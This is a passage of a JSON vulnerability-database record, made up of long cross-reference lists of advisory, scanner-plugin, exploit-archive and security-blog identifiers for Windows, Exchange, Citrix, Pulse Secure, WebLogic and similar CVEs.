["MS:ADV200002", "MS:CVE-2019-0708", "MS:CVE-2019-0803", "MS:CVE-2019-1040", 
"MS:CVE-2020-0601", "MS:CVE-2020-0688", "MS:CVE-2021-26855", "MS:CVE-2021-26857", "MS:CVE-2021-26858", "MS:CVE-2021-27065"]}, {"type": "mskb", "idList": ["KB4534273", "KB4536987", "KB4536988", "KB4536989"]}, {"type": "msrc", "idList": ["MSRC:181F9F2B53D93B5825CF48DFEB8D11C7", "MSRC:4D3D99779455BE99499289F3B3A35F84", "MSRC:6A6ED6A5B652378DCBA3113B064E973B", "MSRC:742C7794FE62E20994070CC0C55D90C3", "MSRC:9FA59725E0E2287517314198EB45ED26", "MSRC:C264A0152D9C51F56714066CBFFAF16B", "MSRC:CC5707634DE28783ABF066B3B22F9E19", "MSRC:E6F280AD39764DECA8E706FC572BCD8F"]}, {"type": "mssecure", "idList": ["MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:748E6D0B920B699D6D088D0AD4422C46", "MSSECURE:9A5D03B503C4E238EEFD4BF9E93C78A9", "MSSECURE:9AAC6D759E6AD62F92B56B228C39C263", "MSSECURE:B42B640CBAB51E35DC07B81926B5F910", "MSSECURE:CBEDB87F4D35A5FD3EE19BAA5965FC1B", "MSSECURE:E0AA6CC56D602890BBD5AF46A036FE67", "MSSECURE:E3C8B97294453D962741782EC959E79C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "myhack58", "idList": ["MYHACK58:62201784367", "MYHACK58:62201889920", "MYHACK58:62201993579", "MYHACK58:62201994152", "MYHACK58:62201994153", "MYHACK58:62201994154", "MYHACK58:62201994162", "MYHACK58:62201994234", "MYHACK58:62201994259", "MYHACK58:62201994388", "MYHACK58:62201994853", "MYHACK58:62201995234", "MYHACK58:62201995523", "MYHACK58:62201995674", "MYHACK58:62201995881"]}, {"type": "nessus", "idList": ["700223.PRM", "700661.PRM", "701078.PRM", "701262.PRM", "701265.PRM", "701277.PRM", "7286.PASL", "ALA_ALAS-2018-970.NASL", "CISCO-SA-20200205-IOSXR-CDP-RCE.NASL", "CITRIX_CTX276688_DIRECT_CHECK.NBIN", "CITRIX_NETSCALER_CTX267027.NASL", "CITRIX_NETSCALER_CTX276688.NASL", "CITRIX_SDWAN_WANOP_MULTIPLE_VULNS.NASL", "CITRIX_SSL_VPN_CVE-2019-19781.NBIN", "COLDFUSION_WIN_APSB18-14.NASL", "CONFLUENCE_6_6_12.NASL", "CONFLUENCE_CVE-2019-3396.NASL", "CROWD_3_4_4.NASL", "CROWD_CVE-2019-11580.NASL", "DEBIAN_DLA-1274.NASL", 
"DEBIAN_DSA-4110.NASL", "DRAYTEK_VIGOR_UNAUTH_RCE.NASL", "EULEROS_SA-2022-2731.NASL", "EULEROS_SA-2022-2766.NASL", "EXIM_4_90_1.NASL", "F5_BIGIP_SOL30518307.NASL", "F5_BIGIP_SOL52145254.NASL", "F5_CVE-2020-5902.NASL", "FEDORA_2018-25A7BA3CB6.NASL", "FEDORA_2018-5AEC14E125.NASL", "FREEBSD_PKG_2BAB995F36D411EA9DAD002590ACAE31.NASL", "FREEBSD_PKG_316B3C3E0E9811E88D4197657151F8C2.NASL", "GENTOO_GLSA-201803-01.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_100479.NASL", "MANAGEENGINE_DESKTOP_CENTRAL_CVE-2020-10189.NBIN", "MICROSOFT_EDGE_CHROMIUM_79_0_309_68.NASL", "MSRDP_CVE-2019-0708.NBIN", "OPENSUSE-2018-170.NASL", "OPENSUSE-2021-677.NASL", "ORACLE_ACCESS_MANAGER_CPU_JUL_2021.NASL", "ORACLE_COHERENCE_CPU_JAN_2020.NASL", "ORACLE_WEBCENTER_PORTAL_CPU_OCT_2020.NBIN", "ORACLE_WEBLOGIC_SERVER_CPU_JAN_2016.NBIN", "ORACLE_WEBLOGIC_SERVER_CVE_2015_4852.NBIN", "PULSE_CONNECT_SECURE-CVE-2019-11510.NASL", "PULSE_CONNECT_SECURE-SA-44101.NASL", "PULSE_CONNECT_SECURE_PATH_TRAVERSAL.NBIN", "SMB_NT_MS19_APR_4493441.NASL", "SMB_NT_MS19_APR_4493446.NASL", "SMB_NT_MS19_APR_4493451.NASL", "SMB_NT_MS19_APR_4493464.NASL", "SMB_NT_MS19_APR_4493470.NASL", "SMB_NT_MS19_APR_4493471.NASL", "SMB_NT_MS19_APR_4493472.NASL", "SMB_NT_MS19_APR_4493474.NASL", "SMB_NT_MS19_APR_4493475.NASL", "SMB_NT_MS19_APR_4493509.NASL", "SMB_NT_MS19_JUN_4503267.NASL", "SMB_NT_MS19_JUN_4503273.NASL", "SMB_NT_MS19_JUN_4503276.NASL", "SMB_NT_MS19_JUN_4503279.NASL", "SMB_NT_MS19_JUN_4503284.NASL", "SMB_NT_MS19_JUN_4503285.NASL", "SMB_NT_MS19_JUN_4503286.NASL", "SMB_NT_MS19_JUN_4503291.NASL", "SMB_NT_MS19_JUN_4503292.NASL", "SMB_NT_MS19_JUN_4503293.NASL", "SMB_NT_MS19_JUN_4503327.NASL", "SMB_NT_MS19_MAY_4499149.NASL", "SMB_NT_MS19_MAY_4499164.NASL", "SMB_NT_MS19_MAY_XP_2003.NASL", "SMB_NT_MS20_FEB_EXCHANGE.NASL", "SMB_NT_MS20_JAN_4528760.NASL", "SMB_NT_MS20_JAN_4534271.NASL", "SMB_NT_MS20_JAN_4534273.NASL", "SMB_NT_MS20_JAN_4534276.NASL", "SMB_NT_MS20_JAN_4534293.NASL", "SMB_NT_MS20_JAN_4534306.NASL", 
"SYMANTEC_MESSAGING_GATEWAY_SYM17-006.NASL", "TELERIK_UI_FOR_ASPNET_AJAX_CVE-2019-18935.NASL", "UBUNTU_USN-3565-1.NASL", "WEBLOGIC_2015_4852.NASL", "WEB_APPLICATION_SCANNING_112521", "WEB_APPLICATION_SCANNING_98613", "WEB_APPLICATION_SCANNING_98638", "WEB_APPLICATION_SCANNING_98639", "WEB_APPLICATION_SCANNING_98640", "WEB_APPLICATION_SCANNING_98641", "WEB_APPLICATION_SCANNING_98656", "WEB_APPLICATION_SCANNING_98657", "WEB_APPLICATION_SCANNING_98658", "WEB_APPLICATION_SCANNING_98659", "WEB_APPLICATION_SCANNING_98660"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310105829", "OPENVAS:1361412562310108067", "OPENVAS:1361412562310108367", "OPENVAS:1361412562310108611", "OPENVAS:1361412562310108794", "OPENVAS:1361412562310140294", "OPENVAS:1361412562310704110", "OPENVAS:1361412562310806622", "OPENVAS:1361412562310813083", "OPENVAS:1361412562310814894", "OPENVAS:1361412562310815019", "OPENVAS:1361412562310815020", "OPENVAS:1361412562310815021", "OPENVAS:1361412562310815022", "OPENVAS:1361412562310815023", "OPENVAS:1361412562310815024", "OPENVAS:1361412562310815033", "OPENVAS:1361412562310815034", "OPENVAS:1361412562310815036", "OPENVAS:1361412562310815051", "OPENVAS:1361412562310815054", "OPENVAS:1361412562310815085", "OPENVAS:1361412562310815086", "OPENVAS:1361412562310815087", "OPENVAS:1361412562310815088", "OPENVAS:1361412562310815205", "OPENVAS:1361412562310815206", "OPENVAS:1361412562310815207", "OPENVAS:1361412562310815208", "OPENVAS:1361412562310815210", "OPENVAS:1361412562310815740", "OPENVAS:1361412562310815741", "OPENVAS:1361412562310815742", "OPENVAS:1361412562310815743", "OPENVAS:1361412562310815744", "OPENVAS:1361412562310815745", "OPENVAS:1361412562310815748", "OPENVAS:1361412562310815749", "OPENVAS:1361412562310815750", "OPENVAS:1361412562310843448", "OPENVAS:1361412562310851706", "OPENVAS:1361412562310874147", "OPENVAS:1361412562310874151", "OPENVAS:1361412562310891274"]}, {"type": "oracle", "idList": ["ORACLE:CPUAPR2017", "ORACLE:CPUJAN2016", 
"ORACLE:CPUJAN2018", "ORACLE:CPUJAN2020", "ORACLE:CPUJAN2021", "ORACLE:CPUJUL2020", "ORACLE:CPUJUL2021", "ORACLE:CPUOCT2016", "ORACLE:CPUOCT2017", "ORACLE:CPUOCT2020"]}, {"type": "osv", "idList": ["OSV:DLA-1274-1", "OSV:DSA-4110-1", "OSV:GO-2022-0535"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:143821", "PACKETSTORM:144405", "PACKETSTORM:147456", "PACKETSTORM:149926", "PACKETSTORM:152268", "PACKETSTORM:152568", "PACKETSTORM:153133", "PACKETSTORM:153627", "PACKETSTORM:154176", "PACKETSTORM:154579", "PACKETSTORM:155904", "PACKETSTORM:155905", "PACKETSTORM:155930", "PACKETSTORM:155947", "PACKETSTORM:155972", "PACKETSTORM:156592", "PACKETSTORM:156620", "PACKETSTORM:156730", "PACKETSTORM:156979", "PACKETSTORM:157054", "PACKETSTORM:157207", "PACKETSTORM:157795", "PACKETSTORM:158056", "PACKETSTORM:158333", "PACKETSTORM:158366", "PACKETSTORM:158581", "PACKETSTORM:159653", "PACKETSTORM:160047", "PACKETSTORM:161065", "PACKETSTORM:162959", "PACKETSTORM:162960", "PACKETSTORM:163810"]}, {"type": "ptsecurity", "idList": ["PT-2020-01", "PT-2020-04"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "QUALYSBLOG:14FD05969C722B5BF3DBBF48ED6DA9C0", "QUALYSBLOG:282A52EA9B1F4C4F3F084197709217B0", "QUALYSBLOG:3B1C0CD4DA2F528B07C93411EA447658", "QUALYSBLOG:400D28FE44174674BB4561AA9416F532", "QUALYSBLOG:45B4EBB10CDE38B36A9C242F3D60C7A4", "QUALYSBLOG:563DC556FF331059CAC2F71B19B341B5", "QUALYSBLOG:66E92B63FC165BEAF707A9D6B2807033", "QUALYSBLOG:82E24C28622F0C96140EDD88C6BD8F54", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:9D071EBE42634FFBB58CB68A83252B41", "QUALYSBLOG:A28C30F71B1450A5D1A2C74AEBD22E6A", "QUALYSBLOG:AE1D32AF43539C7362B2E060204A5413", "QUALYSBLOG:AF3D80BA12D4BBA1EE3BE23A5E730B6C", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", 
"QUALYSBLOG:DE1FEC2B9B661D42DAA0BA398DBFD24E", "QUALYSBLOG:FBDC4B445E6B33502BA1650A8BD4A6E1", "QUALYSBLOG:FD90A85F75806FE26BBC0970B56AFB9D"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:0C3EDBDC537092A20C850F762D5A5856", "RAPID7BLOG:3A2793FB5315EE3613661543700B783B", "RAPID7BLOG:5D8768D89A817B5475C9FEA3577FB0BC", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:7549D87CE6E6AE596B8031184231ECD1", "RAPID7BLOG:C90DF07E98E436DFBFCC5BA576D21019", "RAPID7BLOG:CBD7A5DA1DAAE9DCFD01F104F4B1B5FB", "RAPID7BLOG:E36C557104ECB6E144C21C3C499B0492", "RAPID7BLOG:E8EB68630D38C60B7DE4AF696474210D", "RAPID7BLOG:EAEC3BF3C403DB1C2765FD14F0E03A85", "RAPID7BLOG:F4F1A7CFCF2440B1B23C1904402DDAF2"]}, {"type": "redhatcve", "idList": ["RH:CVE-2018-6789"]}, {"type": "saint", "idList": ["SAINT:364F42DDB229F6E8A0EF4BB04CE504D2", "SAINT:38F4E0E6CE11A2F3EC10321A6DF373E2", "SAINT:4A51F090FB88D7C0687C235D80825104", "SAINT:50889C53D3A04E98F4F7E31365C75978", "SAINT:7C1EF5B76FC3A237B68C699EF952633A", "SAINT:880C926D2511DE57F08789A66AFE11F2", "SAINT:9870FA2AA27A04C7E50DC7E0A2A344D0", "SAINT:A9B0B05DC77287BBA5CCE7B14B30EB70", "SAINT:B8E045060F9ACF0F8D488745DBF66B54", "SAINT:EA211AC1CE6B335FAB2D22929BF61475"]}, {"type": "schneier", "idList": ["SCHNEIER:431597F9B05B18D767EC2998B8C5DD99"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:1B793FC976660636D7A37F563350F59A", "SECURELIST:355BE138D7CDD7D13D1F61F71F8406C4", "SECURELIST:35644FF079836082B5B728F8E95F0EDD", "SECURELIST:67C82A057DBE22C60DC2677D52D52ECD", "SECURELIST:78FB952921DD97BAF55DA33811CB6FE4", "SECURELIST:91CACDF02C22F17E70A0DC58D036F9DE", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:9C375DB331E2434EE824100A45629096", "SECURELIST:D0FFA6E46D43B7A592C34676F2EF3EDB", "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "SECURELIST:F05591B26EFD622E6C72E180A7A47154", "SECURELIST:FD71ACDBBCF57BD4C7DE182D2309BF9D"]}, {"type": "seebug", "idList": ["SSV:96367", "SSV:97269", "SSV:97346"]}, 
{"type": "srcincite", "idList": ["SRC-2020-0011"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2018:0468-1", "OPENSUSE-SU-2021:0677-1", "OPENSUSE-SU-2021:0753-1", "OPENSUSE-SU-2021:0754-1"]}, {"type": "symantec", "idList": ["SMNTC-107691", "SMNTC-108273", "SMNTC-108581", "SMNTC-111238", "SMNTC-111370", "SMNTC-111482", "SMNTC-1411"]}, {"type": "talosblog", "idList": ["TALOSBLOG:00DC30A0F4EFA56F4974DF2C3FB23FBB", "TALOSBLOG:07EF8115BB6D3EE80E914E6572FFCD88", "TALOSBLOG:0D782B308C337CFD06D5A38B03FC90B4", "TALOSBLOG:1E3663A5534D173433518B5C6F3B0E66", "TALOSBLOG:2401133934B407D6B7E1C6D91E886EBA", "TALOSBLOG:25506C78BB084870681BE9F9E1357045", "TALOSBLOG:2B14B5B996283DEF7D095E87B1128109", "TALOSBLOG:2FC8F90E015AB54A7397D49B24BE5B5E", "TALOSBLOG:30A0CC27D6C35FC08DF198CA0AA9C626", "TALOSBLOG:340B43701E5CA96D8B4491CD801FE010", "TALOSBLOG:4C073D825207102B86D0C8999A5A28CC", "TALOSBLOG:56EE545CE9B30B21AC2FD24C6DBB5181", "TALOSBLOG:5757EE09BE22E4808719C348402D3F43", "TALOSBLOG:5A9BEF09DC8FF93E258E2D51361D11E8", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042", "TALOSBLOG:62182E90D88C9282869F40D834CA56BA", "TALOSBLOG:6631705A9B0F56348E3E1A97469105A1", "TALOSBLOG:6A8FEAE9B7E20A5AA1A11907296891AF", "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "TALOSBLOG:71D138211697B43CB345A133B54BC824", "TALOSBLOG:8DB6614E6048947EDBBD91681EE32AB7", "TALOSBLOG:97F975C073505AE88655FF1C539740A6", "TALOSBLOG:9F05FC6E227859F0165366CAA52DDB78", "TALOSBLOG:A2A267E7C20665C55127A15BC5B9F7BD", "TALOSBLOG:A56CDCC440F2E308EB75E66C6F9521B8", "TALOSBLOG:AE189A67BCAD633AD9D7838F9DF4F6D5", "TALOSBLOG:BC6F07233A684778F6CA4B2B7C28B45B", "TALOSBLOG:C41259322CA5338694B85978B0EA6FA5", "TALOSBLOG:C6C252288047D319ADE770A26A8DA196", "TALOSBLOG:C73CDA82B845335B5DCC8A94FB5662D8", "TALOSBLOG:CFBFA4A360F5A4B96A4245B783BAE4C2", "TALOSBLOG:D44D4A467C76DBF910B545640D073425", "TALOSBLOG:D7662F18F14544FB63C58CB527CC3A4A", "TALOSBLOG:DC2E9A485DD55B49C0CC8932C0026F33", "TALOSBLOG:E1AA5BBE6ECD7FF1CDF68AD1858BAA5A", 
"TALOSBLOG:E339E76DD9CC8BF6BC7108066B44196A", "TALOSBLOG:E352F60FA2366D4E0CC72C4BA45B2650", "TALOSBLOG:E7EA34380482751C5595EDE9DA228FA0", "TALOSBLOG:EA0E0FACD93EAC05E55A6C64CC82F3F6", "TALOSBLOG:F5BDBD830CCBBD67980916B9F246B878", "TALOSBLOG:F707E3F271E987A8739DBDECFEEFAE22"]}, {"type": "taosecurity", "idList": ["TAOSECURITY:CF99A8E68CF7727296D8451EE445844C"]}, {"type": "thn", "idList": ["THN:02088F21DB6E2D58FA2FBFDB5C735108", "THN:0E6CD47141AAF54903BD6C1F9BD96F44", "THN:166AAAF7F04EF01C9E049500387BD1FD", "THN:1678C3AE3BCB0278860461A943C3DF30", "THN:1BA2E3EE721856ECEE43B825656909B0", "THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:3266EB2F73FA4A955845C8FEBA4E73C5", "THN:39C614DBFC7ED1BBBEAAD9DC8C04C7CD", "THN:3D0ED27488E8AFC91D99882663F7E35A", "THN:3E9680853FA3A677106A8ED8B7AACBE6", "THN:461B7AEC7D12A32B4ED085F0EA213502", "THN:46994B7A671ED65AD9975F25F514C6E3", "THN:4959B86491B72239BCAF1958D167D57D", "THN:4D730B0E8FB7A8FA81D69770EF31795C", "THN:5617A125FD4E30B9B9B0DFCEDCEB8DB2", "THN:65DE53134A31AE62D9634C0B4AA4E81B", "THN:6D6F52F8E55C98F540525853C434FD08", "THN:6ED39786EE29904C7E93F7A0E35A39CB", "THN:7312C296214FCDE145DA02B933FB28F6", "THN:80D2DBC4130D9FF314BDC4C19EB5CD4E", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:8D0E2C792A85A3FB8EC6A823D487FAE6", "THN:91A2A296EF8B6FD5CD8B904690E810E8", "THN:942BFBB34DF6A24E460572684F648005", "THN:9994A9D5CFB76851BB74C8AD52F3DBBE", "THN:9B536B531E6948881A29BEC793495D1E", "THN:9B966D7333226606F54AD717A81F6D7E", "THN:A3840EA7CD9A7AFC6440CDAED21F07D8", "THN:AE2E46F59043F97BE70DB77C163186E6", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BCC351AC0BA61400C97A7E529C22A518", "THN:CE51F3F4A94EFC268FD06200BF55BECD", "THN:D31DB501A57ADE0C1DBD12724D8CA44C", "THN:D839D3F3F73DC023B139A626D8C9CFE4", "THN:DABC62CDC9B66962217D9A8ABA9DF060", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:E9454DED855ABE5718E4612A2A750A98", "THN:EB3F9784BB2A52721953F128D1B3EAEC", "THN:F1F7A2FB2164F9A7A60AB12A3C71076A"]}, {"type": "threatpost", "idList": 
["THREATPOST:018A5896B52734EF63419DC7D2122C0A", "THREATPOST:040A4A9D0367AA2E807A97FB83D00240", "THREATPOST:06C5D9E6950186757AA989F2557336B3", "THREATPOST:08D7AB11C0B2B0668D71ADCEEB94DB1B", "THREATPOST:0D8008A1EF72C3A6059283D0D896B819", "THREATPOST:1084DB580B431A6B8428C25B78E05C88", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532", "THREATPOST:145B6B682222579D2623C124AE9DACD5", "THREATPOST:163B67EFAB31CDAD34D25B9194438851", "THREATPOST:170045B7C0BA198775BD78B7D00C824E", "THREATPOST:18D24326B561A78A05ACB7E8EE54F396", "THREATPOST:1925DCFAF239C5B25D21852DB978E8E9", "THREATPOST:199785A97C530FECDF2B53B871FBE1C2", "THREATPOST:1D03F5885684829E899CEE4F63F5AC27", "THREATPOST:1FB73160B6AAB2B0406816BB6A61E4CB", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:20EAC8CBCC0B2A55B8195EB5B485B9D6", "THREATPOST:21FB6EBE566C5183C8FD9BDA28A56418", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:22663CEB225A1F7F9DD4EBD8B84956C1", "THREATPOST:24AD38597408C4E7757770D45345AEBA", "THREATPOST:2BD1A92D071EE3E52CB5EA7DD865F60A", "THREATPOST:2BDC072802830F0CC831DE4C4F1FA580", "THREATPOST:2D47D18D36043D4DFBFAD7C64345410E", "THREATPOST:2E607CF584AE6639AC690F7F0CE8C648", "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "THREATPOST:32543D9C50E016B8E5F07112935E35F8", "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "THREATPOST:33026719684C7CD1B70B04B1CFFE2AEB", "THREATPOST:333795A46E195AC657D3C50CFAFE7B55", "THREATPOST:3D0ED9A884FBC4412C79F4B5FF005376", "THREATPOST:3E47C166057EC7923F0BBBE4019F6C75", "THREATPOST:3E89058B621DF5B431A387D18E4F398C", "THREATPOST:420EE567E806D93092741D7BB375AC57", "THREATPOST:472451689B2FA39FCB837D08B514FF91", "THREATPOST:48D622E76FCC26F28B32364668BB1930", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:4C22D22EF8F65F5DA108A15C99CB9F55", "THREATPOST:4D0DF8055D2BC682608C1A746606A6E4", "THREATPOST:4D733D952DD37D57DDA47C16AEAAE1FA", "THREATPOST:4DD624E32718A8990263A37199EEBD02", "THREATPOST:4F1C35A7D4BE774DF9C88794C793181D", 
"THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:54B8C2E27967886BC5CF55CA1E891C6C", "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "THREATPOST:575F655420B93C2305DEE73F769E7E0B", "THREATPOST:58D6B44423A20EFC8CC4AD8B195A7228", "THREATPOST:63D2355B6EF0B975846E034876BC66DF", "THREATPOST:677D5A0A56D06021C8EF30D0361579C6", "THREATPOST:68F4D33A0EE100B39416EDC76C3A3C9F", "THREATPOST:6EA5AB7FCD767A01EA56D7EEF6DA0B0A", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:71C45E867DCD99278A38088B59938B48", "THREATPOST:78996437466E037C7F29EFB1FFBBAB42", "THREATPOST:7BCCC5B4AA7FB7724466FFAB585EC55D", "THREATPOST:7E76268AD6AABF30EEE441619FF98ABF", "THREATPOST:7EE86D3945B51C9DF608A4C06739A5F7", "THREATPOST:816C2C5C3414F66AD1638248B7321FA1", "THREATPOST:85363E24CAB31CC66B298BC023E9CF95", "THREATPOST:891CC19008EEE7B8F1523A2BD4A37993", "THREATPOST:8C45AF2306CB954ACB231C2C0C5EDA9E", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:902F021868A194A6F02A30F8709AA730", "THREATPOST:90739FC29BE2A68C72AAA4B88DB9A420", "THREATPOST:93F1D3DD89A41A41475737BF84F8146C", "THREATPOST:9599D75F1FEDE69B587F551FF63C7C77", "THREATPOST:9688E067E5F287042D4EBC46107C66AF", "THREATPOST:985BD7D2744A9AA9EC43C5DDCD561812", "THREATPOST:99610F4016AECF953EEE643779490F30", "THREATPOST:99AD02BEC4B8423B8E050E0A4E9C4DEB", "THREATPOST:9CCCABE96BBBCC68E56ED78F253FCA7F", "THREATPOST:A105AF0012294477B203EA2AFD1BCE82", "THREATPOST:A298611BE0D737083D0CFFE084BEC006", "THREATPOST:A94AAFAF28062A447CCD0F4C47FFD78C", "THREATPOST:AB0F3CD65F9FE00689C1695CB89ADC3F", "THREATPOST:AB2F6BF7F6EC16383E737E091BA9385B", "THREATPOST:AD4EF56E5440159F6E37D8B403C253D7", "THREATPOST:AD8A075328874910E8DCBC149A6CA284", "THREATPOST:B047BB0FECBD43E30365375959B09B04", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", "THREATPOST:B25070E6CF075EEA6B20C4D8D25ADBE8", "THREATPOST:B53DDA5AD9C6530F631391E064A0D4FA", "THREATPOST:B7F31FCDC8936516C077D39FEF9235AA", "THREATPOST:B956AABD7A9591A8F25851E15000B618", 
"THREATPOST:BC4ECD6616ADCCFFD5717D0A9A0D065B", "THREATPOST:BD8DD789987BFB9BE93AA8FD73E98B40", "THREATPOST:BDEA819E4532E0D1FA016778F659F7E8", "THREATPOST:C535D98924152E648A3633199DAC0F1E", "THREATPOST:CF4E98EC11A9E5961C991FE8C769544E", "THREATPOST:D15D3ADBA9A153B33E9ADCC9E9D6E07D", "THREATPOST:DBA639CBD82839FDE8E9F4AE1031AAF7", "THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:DDC9BA5F3C0866F008FA19229719AA13", "THREATPOST:DF7C78725F19B2637603E423E56656D4", "THREATPOST:EA093948BFD7033F5C9DB5B3199BEED4", "THREATPOST:EE9C0062A3E6400BAF159BCA26EABB34", "THREATPOST:F54AECDBDA250A6122DF9A079CE7AEF3", "THREATPOST:F54F8338674294DE3D323ED03140CB71", "THREATPOST:F655BBBA2F55BA4D5A5093E56BB1E78E", "THREATPOST:FADCF664C06E3747C40C200AE681FDF8", "THREATPOST:FD8657F42A74CEDAA8D3F25A2362E6E8", "THREATPOST:FE41B3825C6A9EE91B00CDADD2AF9147"]}, {"type": "trellix", "idList": ["TRELLIX:595642FD30B52118607424330C136C80", "TRELLIX:6373864BD1A0BAFE3430F237433C84A5", "TRELLIX:6A66742843755E787356176A644AAD06", "TRELLIX:B73136D0B1874E13EB839E42FB157903", "TRELLIX:D9D2CB1A313A30DE730375258BD8DF6E"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:050D656256F03C0EED34A855C44FC7E0", "TRENDMICROBLOG:0EF9DC5097F65BD1DE3DF56D0170F328", "TRENDMICROBLOG:1D57AF69829D398639E3A4113B667998", "TRENDMICROBLOG:342FB0D457FCA0DA93C711A150B5CAE2", "TRENDMICROBLOG:3981EF309A794B1CC15F5BBC6C2B181B", "TRENDMICROBLOG:71352D2908FCBB1B73386712067E79E8", "TRENDMICROBLOG:9BC812C1F699A6136F37C0ACE6451F20", "TRENDMICROBLOG:9FD54B8253FD0053BA014F80A7261833", "TRENDMICROBLOG:A08558154279E1489712528387FEF700"]}, {"type": "ubuntu", "idList": ["USN-3565-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2015-4852", "UB:CVE-2018-6789"]}, {"type": "veracode", "idList": ["VERACODE:22403", "VERACODE:25767"]}, {"type": "zdi", "idList": ["ZDI-20-128", "ZDI-20-258"]}, {"type": "zdt", "idList": ["1337DAY-ID-28326", "1337DAY-ID-28661", "1337DAY-ID-30269", "1337DAY-ID-30290", "1337DAY-ID-31403", "1337DAY-ID-32569", 
"1337DAY-ID-32790", "1337DAY-ID-32826", "1337DAY-ID-32978", "1337DAY-ID-33140", "1337DAY-ID-33275", "1337DAY-ID-33565", "1337DAY-ID-33683", "1337DAY-ID-33794", "1337DAY-ID-33806", "1337DAY-ID-33824", "1337DAY-ID-33828", "1337DAY-ID-34037", "1337DAY-ID-34051", "1337DAY-ID-34095", "1337DAY-ID-34170", "1337DAY-ID-34184", "1337DAY-ID-34235", "1337DAY-ID-34468", "1337DAY-ID-34553", "1337DAY-ID-34646", "1337DAY-ID-34647", "1337DAY-ID-34652", "1337DAY-ID-34748", "1337DAY-ID-35085", "1337DAY-ID-35228", "1337DAY-ID-36350", "1337DAY-ID-36351"]}]}, "score": {"value": -0.3, "vector": "NONE"}, "backreferences": {"references": [{"type": "0daydb", "idList": ["0DAYDB:137B89027DF0ADFC87056CE176A77441", "0DAYDB:7673EE0281A214ED87D52BA25B8C65BA", "0DAYDB:AF426AEE507511B61499B493AB5C0D11", "0DAYDB:C05243B3F6EF6FD2D281FAA1565DB0D6"]}, {"type": "adobe", "idList": ["APSB18-14"]}, {"type": "amazon", "idList": ["ALAS-2018-970"]}, {"type": "archlinux", "idList": ["ASA-201802-6"]}, {"type": "atlassian", "idList": ["ATLASSIAN:CONFSERVER-57971", "ATLASSIAN:CONFSERVER-57974", "ATLASSIAN:CWD-5388"]}, {"type": "attackerkb", "idList": ["AKB:03ABAD00-322E-4905-B8D2-E3DA9F049145", "AKB:0C69B33C-2322-4075-BE16-A92593B75107", "AKB:131226A6-A1E9-48A1-A5D0-AC94BAF8DFD2", "AKB:1A38FF57-43D7-4AFE-9E56-6A773F2B88AE", "AKB:1EB6A6AA-8081-4030-BC12-58CFD5C47668", "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "AKB:255908B4-BA2B-4575-84E5-63690A0110AE", "AKB:2941EA77-EC87-4EFE-8B5C-AD997AEB5502", "AKB:3014CE3B-5D5F-4310-AB9F-3023E9B7126C", "AKB:30E011CE-C422-42D7-BC8C-EFFC7B3B11A3", "AKB:3AC01970-2631-4B37-B354-4040C1A7E983", "AKB:3EC4F6E5-7F60-42EF-9218-009F7538748C", "AKB:43680748-EEC0-4395-9572-2A3534D61D88", "AKB:4501BDF0-F0BC-4E58-ABDB-5A03E74B412F", "AKB:63C1E977-B118-475C-8C47-1046B294E1BA", "AKB:69741DFD-3169-4113-B9D5-F2D752453CCA", "AKB:75221F03-CFA1-478E-9777-568E523E3272", "AKB:7CB9D781-D42B-49AD-8368-7833414FD76A", "AKB:862DFB64-EE07-4F1F-B5F3-8F2C3A560A5F", 
